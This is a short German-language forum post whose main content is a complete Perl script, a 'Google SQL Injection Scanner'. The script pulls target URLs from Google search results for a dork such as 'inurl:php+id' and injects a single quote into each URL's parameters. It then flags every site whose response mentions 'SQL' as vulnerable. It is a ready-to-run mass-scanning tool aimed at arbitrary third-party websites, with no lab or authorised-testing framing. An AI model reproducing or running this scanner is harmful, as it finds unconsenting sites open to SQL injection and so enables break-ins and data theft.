Fisch die Urls halt über Regexp raus. Bsp von nem schwachsinnigen SQLi Scanner:
Code:
#!/usr/bin/perl
#Lame Google SQL Injection Scanner by h0yt3r
#Usage: perl google.pl [Keyword] [Offset]
#Expl: perl google.pl inurl:php+id 100
#If Offset == 1 -> Scan Site #1 to #100
#If Offset == 100 -> Scan Site #100 to #200 etc...

use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9');
$ua->timeout(5);

$keyw   = shift;
$offset = shift;
die("How bouta usage?!\n") if ( $offset !~ /\d+/ );
my @aUrls;
my @bUrls;
my $vulnCounter = 0;
my @vulns;
my $goodURL;
my $goodURL1;
####Google search...
$googlUrl =
    "http://www.google.com/cse?&hl=de&num=100&start=" 
  . $offset
  . "&cx=013269018370076798483:gg7jrrhpsy4&cof=FORID:1&q="
  . $keyw
  . "&sa=Search";
my $response = $ua->get($googlUrl);
print "[x]Ok scanning: " . $googlUrl . "\n";
die("Connection failed!\n") unless ( $response->is_success );

foreach $urls ( $response->content =~ /(<span class=a>(.*?)<\/span>)/g ) {
    $urls =~ s/<(\/.*?|b|.*=a)>//g;
    ( $goodURL = $urls ) =~ s/=\S+/=1%27/g unless ( $urls !~ /\.php\?\S+=/ );
    if ( $goodURL1 ne $goodURL ) { $goodURL1 = $goodURL; }
    else                         { next; }
    push( @bUrls, $goodURL1 );

}
my @unique = ();
my %Seen   = ();
foreach my $elem (@bUrls) {
    next if $Seen{$elem}++;
    push @unique, $elem;
}
foreach (@unique) {
    $resp = $ua->get( "http://" . $_ );
    print "Scanning " . $_ . "\n";
    if ( $resp->content =~ /SQL/ )    #lulz
    {
        print "[x-->]" . $_ . " seems to be vulnerable!\n";
        push( @vulns, $_ );
        $vulnCounter++;
    }
}
print "#############\nThere were totaly "
  . $vulnCounter
  . " sites vulnerable using dork "
  . $keyw . ":\n";
$count = 1;
foreach (@vulns) {
    print "[" . $count . "] http://" . $_ . "\n";
    $count++;
}